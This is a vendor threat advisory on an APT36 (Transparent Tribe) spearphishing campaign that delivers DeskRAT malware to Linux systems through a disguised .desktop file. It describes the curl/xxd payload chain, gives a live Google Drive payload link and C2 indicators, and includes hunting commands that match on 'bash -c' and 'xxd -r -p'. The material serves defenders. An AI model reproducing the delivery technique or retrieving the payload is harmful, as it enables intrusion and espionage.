Executive Summary

The latest campaign attributed to APT36 (also known as Transparent Tribe, Mythic Leopard, and EarthKarkaddan) demonstrates a significant escalation in the group’s technical sophistication and operational focus. Leveraging a custom Golang-based DeskRAT malware, the threat actor has targeted Indian government and defense entities, specifically those operating Linux-based infrastructure. The infection vector is a highly convincing spearphishing email containing a ZIP archive with a malicious .desktop shortcut file masquerading as a legitimate PDF. Upon execution, this shortcut downloads and deploys the DeskRAT payload from Google Drive, establishes persistence via GNOME autostart, and communicates with a WebSocket-based command and control (C2) server at seemysitelive[.]store. The campaign employs advanced anti-analysis, anti-sandbox, and evasion techniques, making detection and remediation challenging for traditional security controls. This advisory provides a comprehensive technical breakdown, victimology, and actionable recommendations to mitigate the risk posed by this campaign.

Threat Actor Profile

APT36 is a Pakistan-based advanced persistent threat group active since at least 2013. The group is widely recognized for its persistent cyber-espionage operations against Indian government, military, and critical infrastructure sectors. APT36 is known for its adaptive tactics, including the use of custom malware, social engineering, and leveraging legitimate cloud services for payload delivery and C2. The group’s operational objectives are primarily intelligence gathering, long-term access, and exfiltration of sensitive data. Previous campaigns have targeted Windows environments, but this latest operation marks a notable pivot to Linux, reflecting the group’s evolving capabilities and targeting strategy.

Technical Analysis of Malware/TTPs

The infection chain begins with a spearphishing email containing a ZIP archive. This archive includes a .desktop file, such as PROCUREMENT_OF_MANPORTABLE_&_COMPAC.pdf.desktop, which is crafted to appear as a legitimate PDF document. The file uses a PDF icon and a plausible filename to entice the recipient into execution.

Upon execution, the .desktop file initiates a multi-stage process. First, it leverages curl to download a hex-encoded Golang ELF binary from a Google Drive link (e.g., https://drive.google.com/uc?export=download&id=1VQQiTt78N3KpYJzVbE-95uILnO84Wz_-). The payload is decoded using xxd -r -p and written to /tmp/PROCUREMENT_OF_MANPORTABLE_&_COMPAC.pdf-[timestamp], after which it is made executable and launched in the background. To reduce suspicion, the script simultaneously opens a decoy PDF in Firefox.

Persistence is achieved by configuring the .desktop file for GNOME autostart, ensuring the malware executes upon user login. The DeskRAT payload incorporates anti-debugging and anti-sandboxing routines, complicating analysis and detection. The malware establishes a WebSocket connection to the C2 server at ws://seemysitelive[.]store:8080/ws, retrying every 10 seconds if the connection fails. The C2 server responds with the banner "Welcome to Stealth Server," confirming successful communication.

The campaign’s technical sophistication is further evidenced by its use of obfuscated commands within the .desktop file, large base64-encoded icon data to mask malicious code, and the deployment of Go binaries in ephemeral directories such as /tmp and /var/tmp. These techniques collectively enable the malware to evade signature-based detection and persist within targeted environments.

Exploitation in the Wild

This campaign has been observed actively targeting Indian government and defense organizations, with a particular emphasis on Linux-based infrastructure. The spearphishing emails are themed around procurement and official documentation, increasing the likelihood of user interaction within the intended victim pool. The impact of successful exploitation includes unauthorized access, long-term persistence, data exfiltration, and potential lateral movement within sensitive networks. The use of Google Drive for payload delivery and a non-standard WebSocket C2 channel further complicates detection and response efforts, as these services are often whitelisted or overlooked by conventional security appliances.

Victimology and Targeting

The primary victims of this campaign are Indian government agencies, defense contractors, and associated critical infrastructure entities. The targeting is highly selective, with phishing lures tailored to procurement and operational themes relevant to the Indian public sector. The campaign specifically exploits Linux desktop environments, particularly those running GNOME or similar platforms that support .desktop autostart functionality. Any Linux distribution with user access to execute .desktop files and the presence of curl, xxd, and bash in the user’s PATH is at risk. This includes, but is not limited to, Ubuntu, Debian, Fedora, CentOS, Red Hat, Kali, Mint, and Arch. The attack does not exploit a vendor-specific vulnerability but rather abuses standard Linux desktop features and user behavior.

Mitigation and Countermeasures

Organizations are strongly advised to implement the following countermeasures to mitigate the risk posed by this campaign. First, block all outbound connections to the C2 infrastructure, specifically the domain seemysitelive[.]store, IP address 164.215.103.55, and WebSocket traffic on port 8080. Conduct proactive threat hunting across all Linux endpoints for the provided file hashes, including the ZIP archive, .desktop file, and Golang ELF payload. Search for .desktop files with suspicious Exec fields containing bash -c and curl commands, and identify Go binaries residing in /tmp or /var/tmp.

Enhance email security controls to block ZIP attachments containing .desktop files and flag procurement-themed phishing emails with similar attachment patterns. Employ the following threat hunting queries: find / -name "*.desktop" -exec grep -l "bash -c" {} \;, grep -r "xxd -r -p" /var/log/, and find /tmp /var/tmp -type f -executable -exec file {} \; | grep "Go building". Perform memory analysis on suspicious Go processes to detect active WebSocket connections and embedded configuration data.

User awareness training should emphasize the risks associated with opening unsolicited ZIP attachments and executing files with double extensions (e.g., .pdf.desktop). Where possible, restrict the execution of .desktop files from email attachments and enforce application whitelisting policies. Regularly update endpoint detection and response (EDR) solutions to recognize the latest IOCs and behavioral indicators associated with this campaign.

References

CloudSEK Investigation Report: https://cloudsek.com/blog/investigation-report-apt36-malware-campaign-using-desktop-entry-files-and-google-drive-payload-delivery

Relevant X (Twitter) Thread: https://x.com/SinghSoodeep/status/1955860231109665108

MITRE ATT&CK for Enterprise: https://attack.mitre.org/groups/G0139/ (APT36/Transparent Tribe)

About Rescana

Rescana delivers advanced third-party risk management (TPRM) solutions, empowering organizations to continuously monitor, assess, and mitigate cyber threats across their extended supply chain. Our platform leverages real-time intelligence, automated risk scoring, and actionable insights to help security teams stay ahead of emerging threats and ensure robust cyber resilience. For more information or to discuss how Rescana can support your organization’s security posture, we are happy to answer questions at ops@rescana.com.